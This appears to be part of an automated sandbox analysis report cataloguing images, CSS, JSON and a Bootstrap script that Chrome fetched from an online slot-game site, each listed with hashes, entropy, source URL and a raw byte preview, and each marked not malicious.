                                                      Entropy (8bit):7.861689203566001
                                                      Encrypted:false
                                                      SSDEEP:48:2XCNILaPjbJriBND5E3iM9M+sQ9Sif0BlrmqFdRsN9pWOyGoR0h/E+smUWlIjUud:NGGrbW5lMtEhfFYM31Kh/EHWlMKOY3pk
                                                      MD5:57091F1AD57C56BBB3CB3F94A0F32282
                                                      SHA1:518CE2AED7DEA9F4F1DE1370D89D90E59CEF4787
                                                      SHA-256:0CB41F67295BB5466DC69AC14E729D181CA6D1706CBD1637AA8C3E6ACE4801E5
                                                      SHA-512:262EA83ED924FBBCFC124A205DF80EE04D4705F11C86AA1F11AC0EFECC40DC47D1774764EC1F79E2159E226F1BA68F91E05D5E355FF2826C7781B947DFC11499
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/61_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P.....3PLTE....................................................|y.....tRNS.....@..0` .P..p..s.....IDATx...!..... ....F .................g.I..0.E.6.....I%..v2q.E..n>U..i.....yv.r.nZ..].].i..7]...e.].\.....:......Q......M].+...NO>Wk...b...X.5(;F..].Z......[]["3F.....qj*h:...9%..m....M...\.=.........6.:<?.&.i.tC.3Y..`e.#..<..W.h.$0s..3..\.Z...1....hh...h.&..L...B..E......6Yf..EK..l...B.G.F.....P9..q.z./3..zh/.C.<..N.^.....;.&.S.R;... 9.......*....`.._.P..W.....BC.T .....In....BQ.....2...92>....UE......#.P.z.....~o...Ij!.OB...\....&8...!C..p..K:.O..(C..:...A..|r../.....g.CF.2E....#@U.........L..o7....wX@..z... .\.'CR..9....&..d.Y..=.......L..`....DF...YH....8.;...&5...Yd....0M..{....Y.....1......IdB..~\.....D.$........d....a.........l....@.....M...+.#.I...d....5\...B..H..e...._.f.LJ.+.N.M....B.@..tR..5..(.|1.H1kP...G....Y..5.9...I...DB..!^..D..Y.W..xfR..pF.."..X.{n.-j.>JK6...;...X.e.E&.)}.>.D@.\.1d..`.&.*.l..d= ....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3257
                                                      Entropy (8bit):7.857766714640959
                                                      Encrypted:false
                                                      SSDEEP:96:+ENcsQt12XXmckpn6v6MA/Mlfe2cS+Aj2cgaVnVm:HcbjIDe6vLiGfe2cShj2cdm
                                                      MD5:F41DFEF3EF8A20A306025C90220C6171
                                                      SHA1:2FED9A4C724617A69312DBB459EC41FFFA600D19
                                                      SHA-256:2379BE04D873B249C915D5CA050638257663747509DEEAD222ED4027CBF564B4
                                                      SHA-512:7AF966CFA74016196E5784245F9A9090587E5BD5A33915935327DD5BF1F5E26E74E837C1DCC8B9B14946EE1BC130D0E076393F10D5EF4D59A34345A5B20119B7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....tPLTE.....8..$(...".."(..(...8..".m...8..$..$..$..$..$..$.m...8.m.e.A..8e.A..$'...8.m.e.A..$e.A.."e.A'....$.m.(..&...m.e.Ae.A(..(...m.g.A..8..8.m...8.m..m...8.."..$..8..$..8(..(..e.A.."(..e.A..8e.A(..(..e.A..$..".."..$.o...$.."e.A..".m.'..."'...".m...$..9e.A.."..8..9.m.#..e.A..".q. .."....$.."..##...8(....$e.A..".m..."..........."..#|.>..9..#..#"..m.@..<..;..$.w.t.?..:...;...dtRNS.@..@.@.......`0...........@@.....@0.....`_0 .....`P.. ..rp`P0 ...`P0 ..pp0...P.P..q..nP.f..`.....IDATx.....P....e.c.N........P.R....Yt.....9.c.....>.E.gg..p>.?...|.9..B.!..B.!..B.!..B.!..B.!..B.!......`.Z...o5h^.vMX.xt.B.4.(......7...A*M]w..G.M(<7..PAj0.8fj....k...q..(.Q.p....-.c.Z....x(\.dX4..2*...-.U.X.~..Q.Bh.."..f...t..R.P.Q......v.....e`.....;..\.._;.h&V`..[.rJ...D`.......}i'..........S.pDz..[M.......j..n...<.......}.9.Nmh&..2.L.......+...k.$.o=.m.A.tJ.T..:*`.OH+.......O...Q=..`...B...aC...}......T..z..S.x....U.d..Xj.M*z2C...?..)
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 4669
                                                      Category:downloaded
                                                      Size (bytes):1544
                                                      Entropy (8bit):7.874409510749914
                                                      Encrypted:false
                                                      SSDEEP:48:XGwwwtiXRnOlGcUlwZOzm5l6/f+KtWWym8S5PxLm1OB:FwZ1OsKZOzmH6XNWWt84GOB
                                                      MD5:C5B8632C8029723C84687F9E684B481D
                                                      SHA1:72811D0B7807B663F118C97449C1C5849C3E855D
                                                      SHA-256:3F2F568F4378E43180D1B6F237FDF719A9BD19D2C5DC0AF9643BFDC5694CBD2C
                                                      SHA-512:FBD503D7823FF8E93E45B2D858544B84C39B0EFC0121E05E5357440D38CB2DA3F6928491BB059F5AE85591BB47B481870C161D7EA1A56FD841F75C4038193BEC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131
                                                      Preview:...........X[o.6.~....m...;......a...J.,6.)PT.....9.......b.........a...........`4c.*F.o..K...(.Z.jE&..id.3r2.o..7k'..5.....).=...p...|9y..o.lE....jEN&.E<..o].Z...S.....u..<....q\?.Q.HLh.e..YX...M....i.q.......N...iu.`..PN.....bk.K.h...j...(65MY.0...@..Lmm.N.<..W.T......jt.....ELl.Z_.r...@z..9..5..A:SH.y].o.7...$&.J,...^...NhIE...6[..P.P}.v....]9+&.mg...h..#Z...\..bj............@....n...H.,.T.%M.......f...t......x...,.j..5..r..E..}8.R..S.4<q1.^}..in....$M..g.q.c../.S.e].A.....b._Lw....g.U/H4...x...%.z@6ia...v...:H.V..|o.Ir.+./Pw<.T.g.$.I...r6....^.f.=p9.....kNB.........K.K|..F.e....xS.......t.."si.+.U...b..]eL....D..=~....8...e......s.S.>..G.h...._.l4...xH.C.(.T...c^..k..m....*)....S!#.jF..|.v=...t).1..o..b..@..B....a..q0.....1a.d.R...p.....6..\......8.....>F......L.-.........Y3E...*N../.C!.q....>s.r..,.>.....j^...O0e.//.....x..tF4...!...;E......-&K49>.IS..Mn..Dc....SA.&..V..................<....&j..9...hm.h.k.Z.O...:...d..,....).U
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):20536
                                                      Entropy (8bit):7.985215977466965
                                                      Encrypted:false
                                                      SSDEEP:384:LE5J4SGkcGwN8mQxX9ns9dR7wK8T8GifNw45AAVtrltxP+LDs3L9Y0cJy:LOJ4FjXQ89zb8T8hfu4zVl4LI7hj
                                                      MD5:7D00FFB99332030D329DB3C5322D488B
                                                      SHA1:B6D2CEE4AB5EB36962099AA6666F16A67E13403C
                                                      SHA-256:276D32F1DECB7AC22E3887FF1EEA75D3AA5BF531474403077E43CFD51261641C
                                                      SHA-512:7C5981A5CA884069D7AC112DF91534DC98FEAE87E0223546681D541AD850C2121A5864E0CD2B5927E6A098848A93A1E3DEA393807E3873E8464C4DA318AC997A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/ww3a8wsu4de7c.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE...........................s..z...........m....................g.....a...............#..P..+........F..w..4.....n.....Y.....=.....`..+....mii.#.....2.5..X......g...................X..?3.N....*.......:.S....*.............-.[...(..,..W....A.....&'"...K......F..h.E......C..=..B....Q..l..[..U.....P..y..>.t.2........`].....6....-................l......9....\.<.....C...7..Y.).......m........f..}.. '..............W0.......~|.U...P..6.)..|........f~.sp.%#.......F......c.N.j..1..6.....*..k....<..$K4..la.w....5.c(.I....W.8..b\\.j=.....{S4...y.b$.X.LF..:,.@!\...Go"8.P".....d..zL^?<>=<.".)%...~}|k$....q.Kg.~..:=.11......RO.((D.....i...,SQQQj=....|....".*5.>A....TW..3.@L.ps.,!](....\X/}9.Z5wK@..`.Y;5..Fm?.L...}H.5.i.).]Tr..1.....3..n.Dt..z.^W:...L.IDATx.|.M..0...t....(Q..^ ...bv^%'.......3.8.D.#M..~.O!N.....b.`.....s../.D."f.....>?e.V...}...).5.H%..&hL..|. j... .....;e8.9..J.?..n.....Y%.r..;-.....A.t...8..b.;...@.w..|M.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):32813
                                                      Entropy (8bit):7.993414503236765
                                                      Encrypted:true
                                                      SSDEEP:768:Jpd6r6IDZPjZirXpe0dl+759bm5iOO/0uSrU8cfTZYfTpZm3:1MxeEOE759bxH/JSYL9YrDO
                                                      MD5:DE1E01EB97CE1267009C71A64415DBD1
                                                      SHA1:88E204207FB23186A30BD58F94CAA4238F387DB4
                                                      SHA-256:5D72928D566DE8EF8D3D9E33A40D9E1521126473CCBCF322B604C8E0BFA49DCC
                                                      SHA-512:DAD3E162AFC70AA80E7692563AC353BA7830482C40F5A58204A02DCDAF0B074CE985025B77E0472203E0B51C42DEC42557FC669EF4E35083B10507B08B68549B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/3yfmucpss64mk.png?ver=1673334590
                                                      Preview:.PNG........IHDR...............^.....PLTE,..5.....n2;?..U.(P..g,7b'3...y9B?.."..]#.......W'...4I".K..K.....e"%...h...._...q),[....\.......Ju..........S..............yB.#e..j2.W...A....}/3.x....O3.....>..c.....e....x....).\.....@..p..*..].rB.a0....6:..<...S...........R.....k.....CK.g..B..v.n.....C!;'.{2.q-..%.....R..L..@......0.F&...Q...........r..?".Y5..h..)...{V6..../..j....I.n0.J,..9.3....v.!xC.a..V#..W....;B.MQ#i;G.Y.).>rJ..^.p>TA0+...])jH ....W..2.1....{s.p_..G.2]B...t..}..M.X.M!...2aB.').>G.j(..'..KhN7E6..<.O.m.r/.8$..Z.sQ.,.$'..&.O.c4..0.V:..+..x^..8.]6T5..yW.m.....K...H.k....%...y....+..}UQN.=FU...ZZW..HYB2....._a.][...e.mg|A...qA.f.'.'.s&.._.Hn'c.4.j.y..m.....z...U-....ybY.Ra6o`..J....+K.I.gpj.Y...=P.....9.Z.Xo3..b.=....\...}.IDATx.d..O#U...f.....(.V..t(.a.W.P..-+8tw...Sl..%+R......Y."~m.hM.*i.L..F.j.Pc6.EoV...Y5.._.....p:.<...9.No...d.!.\..dV......4.!#82:........bY..X|..3,9?0.JH...m.....Ss../~...N.jo...k...s..]..R..6....._H.<.Y.b..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):3433
                                                      Entropy (8bit):5.027448140828748
                                                      Encrypted:false
                                                      SSDEEP:96:6muOBOhjag3VP7QR+VBfEO6NodGQhlYxBrj:6muOBOhjt3VzQkVBfEO6NodGQ0Hv
                                                      MD5:108DE3688348603249E2EF4FF76E683A
                                                      SHA1:00578BE1BC0CF509E92C1F426912220B1A50112D
                                                      SHA-256:AAAFD6456F786EDC4C5E15B241494B7695C81D1D23DB593950485F9F3D47A697
                                                      SHA-512:BCE8325D4B7E47D88080428FEEE8F569384B4BF64E315C9D17AF3FF151D7FB1F8331FC2922EE9442436B202237BF1D0E377FFAB2E523F8D7783590ED7184763E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":38229,"name":"Treasure Bowls","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_TreasureBowls.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":38228,"name":"FaFa Fortune","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_FaFaFortune.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":35972,"name":"Wonder Woods","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_wonderWoods.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":35971,"name":"Treasure Skyland","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_treasureSkyland.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32033)
                                                      Category:dropped
                                                      Size (bytes):37045
                                                      Entropy (8bit):5.174934618594778
                                                      Encrypted:false
                                                      SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                      MD5:5869C96CC8F19086AEE625D670D741F9
                                                      SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                      SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                      SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2370
                                                      Entropy (8bit):7.837265989824533
                                                      Encrypted:false
                                                      SSDEEP:48:afBvHW/C24jL8KNMyUeQXRYMh4eeD+54TvcwmWTvtnnneQ:a5uq24jrU2MhqDAKvbxeQ
                                                      MD5:BB9BBCCD34B30D852118928C268B0026
                                                      SHA1:C463B84E8722A3512B60A0368A05ABF0ED890781
                                                      SHA-256:12067FF552E31375CEE21F6331E001A696A2570C65D35452B91A1C894A110A33
                                                      SHA-512:4A7604EF0428887F7CAEE4447A587CDB3665D73799E5B298C97C4986EC3C6C6EABFF5F7A463A3FDEC49F42AE71BE378383D7576743A80C90906F67F5876FA25B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/136_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P.....3PLTE...5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z...@....tRNS.@.... .`.P.0.p.".V....IDATx..............................={.m.....n.,......eNi+..V...........0..0..0...e.*k...1.....L...i.c.Vp4.0......'..).M...o".4.LK...ET.{f.2......^.X.z.(-.?..y<...2.z.7..{88..x&T..t..0..#K...\.L....?..G(....al.....Ud.H.}...a..)..C^..c^.?.......'..........w.?C./.qdY.^T.L~..0..+.)N<,..a\..5......3....8|........&...m.....@.....v.P..y2.`..4......0.Ofv.o.;.6k....GO8K....Ar!K...m.&..Z..y.vHhS1...K..0..>...R~.....y.|..V0..XR...m{.(....QO...,....0....).....f0v=...*vTGw..m.s...r4....^c.:.V06..m.cM.....0...YO~..4%#.r.2....L.....V.g..MF.S^...x.i..N2...jMV.....`.s.......%...JfvD.S.....,~..R~'.J$.k.gtC.P.ej..&+0U..e.A.-m.]8z<IN..K.........*0%.ze.M/5)..jn`........R=._..r. ...G....?m..L...Y.^.4.u2.....aEf.\......'f'V..fwH.....A-"..H.....Ay.`.,0|{.....fGBf8...aA.....f....0%!..=%....{.:...]/7..35%.o.1t.\S`&V}..[..'O..V.ih....;.f..JI8.f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32033)
                                                      Category:downloaded
                                                      Size (bytes):37045
                                                      Entropy (8bit):5.174934618594778
                                                      Encrypted:false
                                                      SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                      MD5:5869C96CC8F19086AEE625D670D741F9
                                                      SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                      SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                      SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/plus/plugin/js/bootstrap.min.js?ver=1606790105
                                                      Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):28572
                                                      Entropy (8bit):7.990856806047853
                                                      Encrypted:true
                                                      SSDEEP:768:pl61Y1HgGJIfhcrVJ2OvtxKNDL9lq7ZE4e8uGVZotuFlzqyW:361+IhcrmOV+vq7i4B9fnBW
                                                      MD5:CDC69EF23D92D5E3D428039E69561519
                                                      SHA1:C702690C4810DAA7918CDC6B6CA3395460715F18
                                                      SHA-256:0F88D3E2ED08038F095B6A930F3B679705D01E0F6845C7B71ED86AEACE6BDBE2
                                                      SHA-512:1E45C5DBE8E0F9FCBD1B97CE9AC87A4608DEF27C3B228D1C95D976402CCF8891B7056A61D1448CE853B25FC34550BF5D4E7D07C05316B8B125ED72386A8800D1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/qqgindypyeboy.png?ver=1733369194
                                                      Preview:.PNG........IHDR...............^.....PLTE.... _... "c..[..V..M....[.#""..9.........!$m.......U.577.D....(),?@A1/.."S.`.HIIQRR."F..-.N..-i.;..&aY\].....I..?.....".)3eef.....@,,e.f..C..}......6.M.mpr.4s..F.6..o.y{y...........S.x...d..+...+............)x....3@.....=\.-P3...........+Sn* s..r./.>{.|../-..".......#...=>.u..yf.m.......K.............%&P..........JH....[....3..f....C...6^.m._.....P.....C.&.............0..9.!..w.08W.......E?..<.Z.....H......1....s.../3s..U.N...V.`....}L-........QR.k;..}.........\.X.;Gl.g..[O.h6,.....(+.....h...e...]K.f@?R=..VL.",.i_.9..!..{,..6.X&."M........R..q.....M....jP..Q...da..;&....]6...op....$.F.te7.v.q........R.WO!...rUK..4>...Zx.<t.....JD....p9.....dv..\U.n[...66.T*Fc....k....{".dV..?c.cv....~...TzC \ah............h.OC.p.B..{.X..E..7Q.,..G..5j.5-.&..lWIDATx....XS......5.H.&Af...J... ......J.A."...Q9( j..@...X.RA..g.:Q..l.k...Vk.|.............!B.....7r%K..&'g-...e.25.)/l..C.....%ki......o......C...'+......!. .~..{......}&..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):20772
                                                      Entropy (8bit):7.9735284418218075
                                                      Encrypted:false
                                                      SSDEEP:384:FcxduA+YKPVkl5ct30ugZyGBK2SWxiYr2t0oUxia6+TWAks4mXaODk:C+9SuVgbAZWximW0oU8QW/3ODk
                                                      MD5:5C333F9BAADFEB4764C65D4AD4506049
                                                      SHA1:34E7BCE39EB29B61F1E0107D12A33DF72996A3D4
                                                      SHA-256:D831F9E5CB666D1BC4535C44697461439421D3B584E5E6E83C088F696FBD6CA0
                                                      SHA-512:52394575A36C44C1660FD9A7816DBE0B6135F0DE233589825E8BD42CEC8005F7A595E825DECE4884984C9A8ECE57E260CB8C7CD1C888DAE18ACF963C7386A757
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_risingRoyals.png?ver=1712128601
                                                      Preview:.PNG........IHDR...............^.....PLTE..3.....<..;..K..N..Q..C.(Y>:.@,.?#.< .9..6..5..Z.j..|}.`b.8l.?w.CP.=..5#.8..20.9A.6<.6h.H|0iJ1d.....{n..s.bP.I>.0*.......g6.........{.v..w..z..l}.eu.n..................................................}..u.yk.pa.h\z^OrUDiJ8\>4R6(='"$..3..@%.I+.U0.j<"R .d).n9.|E..K..[..g........%..7.?............p..`..E.......y..c..J...+..:9.^T.JC.nf.ae.S=.cA.eQ.kW.t_.{c..m..s..|.....n.nN4..D..T..e..b..\..W..N..D..=.u7.i/.]'.P..D..>J15..Q.t<..K..Q.Y.s(....h.lV.}b..c.a%.-.|..#...5...C.v$.T..z@..........t.o..d..afIF.uG</D..0 .@,&f2-r22v# [$.i..b..N;.TM&QY;RmM\{Rg.R.k7.R)w_>nmJ|W@.I8.L?.PF.J@.B9.<6.>3.xC.g4.b-.Z".M..............\.B......x.._.S.E..7.4.A.P..[..Y..o..m.......z..u..o.k.h.a._.X..T..J..F.w;.l2.f0._,.W(wO&lK.^>.N6.&.&..4..6..4......M.IDATx...|T....[...I.H/.....^Uz...$$.fE....E... RC..( (.BG...{.tBoIf..{d.If&........L.=q....o.=..(.n$Q.iu[.. B.1~...Y.>..............C.!PV..BA..`)d.ThxJ..=&.j.3..%.W..C.1.Ch.\..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):26714
                                                      Entropy (8bit):7.985073742083564
                                                      Encrypted:false
                                                      SSDEEP:768:MKydKrLunxUGLBQgIOU5P/Iv2XkG5cDSxnNwW1bnT1Q:MWL+nIOUVl0cqSJNwonZQ
                                                      MD5:E2E6750FDA8C43D5832B69CB007D8C0C
                                                      SHA1:37F4CF347834A4D79660BE8ED4B823F771E87CDC
                                                      SHA-256:BC4EA0F2F4D9864F7C25FC0BF267D6EF41A1F0FA79CAF442FB7B96308A99D1DB
                                                      SHA-512:BBA577AE84D56C77D2A9D8DA3D5A8BD1320127581045083F5E61B68868EFB3F1FF45A88A43715254613F6534C7E0BCDEBB064A9F8ECD0D92FA70F30A12044D26
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/gamekey/1.png?ver=1659683709
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE'&W&/e(*\ (_..&$.0...$$V"*a&'Z".*+&; )g)-_#-k/=w%.8..0.. *$2%#R......)3k,7s......41E0,>"/qD@V?<P...96J$:~IE[...3H.'D.3A}...'..y..XXs#4wNLaWTh'I.gh.'A.)^.bau42V&"C0'F--N......03d.V.yz........=k.y.4O..s{7$7#..ro.7Gr..h..KJn...4<]r......~..nC.j..|K.d=...@=dkt._..4..G..=/<;...|.......^...[`....Y..2 -....p....x!..sI[*.......Kw.$.@>e..W_L]Q[..Tvct<u..]L".CH{J..oy.-...J...?' ..(lVd...0z....*@PW@P.Xw..I6D...@e......e...0..|..i/.g>%...z..P|....9].9K`....wJ.....R9.x...s.iy...S......H.......`..o....q.Y...X..}A.{LQ......BQ.r..+F...G..eRA{T4.#..U2...CW.............Pj....bg....[j.T...{S.......gB...+V.fj....[c....f>.....(J.3VyEp.Rx..pNw......A...W..p\.oyj;E8f.F_w.....l...^].._..$5.....m`.......b.R....../........W.....p........:~........S*.........ve.. .IDATx...\S... A%....$&..1.$..A...........pvA..(.a....[..+(....8~.*..*.V.UD..S.:.:.:l............!..4Y..{.w..Fo..."0+.E.5as..`...<.y...\..p.....y...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):399
                                                      Entropy (8bit):6.033338487326961
                                                      Encrypted:false
                                                      SSDEEP:6:6v/lhPknzIoaRTl+u/L2RUwQhmcEIqh1mZQRxnuXd/+Wh2wjcPTdtK4nMq7yp:6v/7graLr2RUBhmcFbmgGzlM5
                                                      MD5:0F2EAF9D1679E974F3B610E3ACB1171D
                                                      SHA1:65A30DB81DD37647FA955076AEEB175B9BE1D53D
                                                      SHA-256:8BF266FADC7AFBEC1F2A3A47756EAABFE3306102696B8303E585467C4EBD2BE7
                                                      SHA-512:4370540454F668D4A26ABC09B7F863C45070E8AC8144A69276481028BD28C0696DED2027C78899AC9DB6AA7B2B4C19D7C08901782E52159B77AEA9DAC8214A4C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...................cPLTE....................................................................................................E..... tRNS.X........vE...|obRJ>/...gL;&...J.....IDAT(.e.Y..0.DCHdQ....w.SZl...WWO*.....u...Q.~}....)...r.@&~.\}yr.w..>.nA+...C.P. ...L2.!?d,.....{. ....w.......KW.{.Xw......e....^..sk.tn.[V.X=6Q+..F.?.H../.*.cC..IF.G._.`._.f./...e.$......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 204 x 23
                                                      Category:dropped
                                                      Size (bytes):620
                                                      Entropy (8bit):7.47292623667424
                                                      Encrypted:false
                                                      SSDEEP:12:MOoKTM6vu0xRKUBSlIReDl89cj2w2y/n8yc8E5j8GoPYwkGZDtL:MS1u0bBS2eWExbDE5cRk8ZL
                                                      MD5:7C5D7D1DADD0CF04FF184D3CC7BCEB0A
                                                      SHA1:18A9F45930646CC269B8382FA2BCBFAD76703A3A
                                                      SHA-256:4612F5E2F5F34A0075FD97CDB9EA4D9A3CFD1D24749B9BC7A0AAFB0E2CA2B960
                                                      SHA-512:D166AB123258D07E09851A02CD1AB905CD95BDDD4D32EBA071A84A42B8A9785A5C6C861D9EEE5C81D9351AB38C29E3C68456E4C5317EFFDF9B1206C6BD5E1FD6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a..........M....)...M.F..8.......!.`k........?.u0.j\.....!.Q....."0.Nz....k.?..-?.J\.Cz.<..&..1.....U!..NETSCAPE2.0.....!.......,............'.di.h..l.p,.tm.x..|....pH,...V.@.Q...4...*.E.du..]R.........D.v...........*.y.$.y.$x..k.kmo.qm.$u(....z[..).z.%..^".y...G.pmn..v&....".(.z}#......E.....#.wy.......'....%.....e..A.q....T...#....(...........#...m0...`....>... .k.J.j. O....p2@.$..o......5=y$.. h.F...}..h...hL......6."\.`...].`..x/..}...*7b...`k.].`.-.y4!....._0.P..aZ...~`.!..(z.....E.v.*N......l..|..m'...f.H":..8."+.....!`d..c.....}]F.=9..~%....[v..?.@..D..$..n...............O.|...;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 225 x 52, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):3654
                                                      Entropy (8bit):7.7489916959733405
                                                      Encrypted:false
                                                      SSDEEP:96:bnT7i6W/yqLrihPIvwOMroyTqAXjd+TfzVlpSE:+JLXsroU0xSE
                                                      MD5:A7600C8721C979B4BA512F27D27F5302
                                                      SHA1:3C17ABE7EF649261B112C249D2525AE149F59F40
                                                      SHA-256:C18C087C20F08E0B995B3355D04C386FE18DCA348A112758922735F8A1B1C6AC
                                                      SHA-512:FB313C9018E2891570CA8C8CBCF430DC25A1A749C459405707E31CB199E13EE10DE1110EC066EC0619F3D771E0BC313A6C01F55D64AA232852EEFF0C56B528FD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/224_egame_icon.png?1736725697344
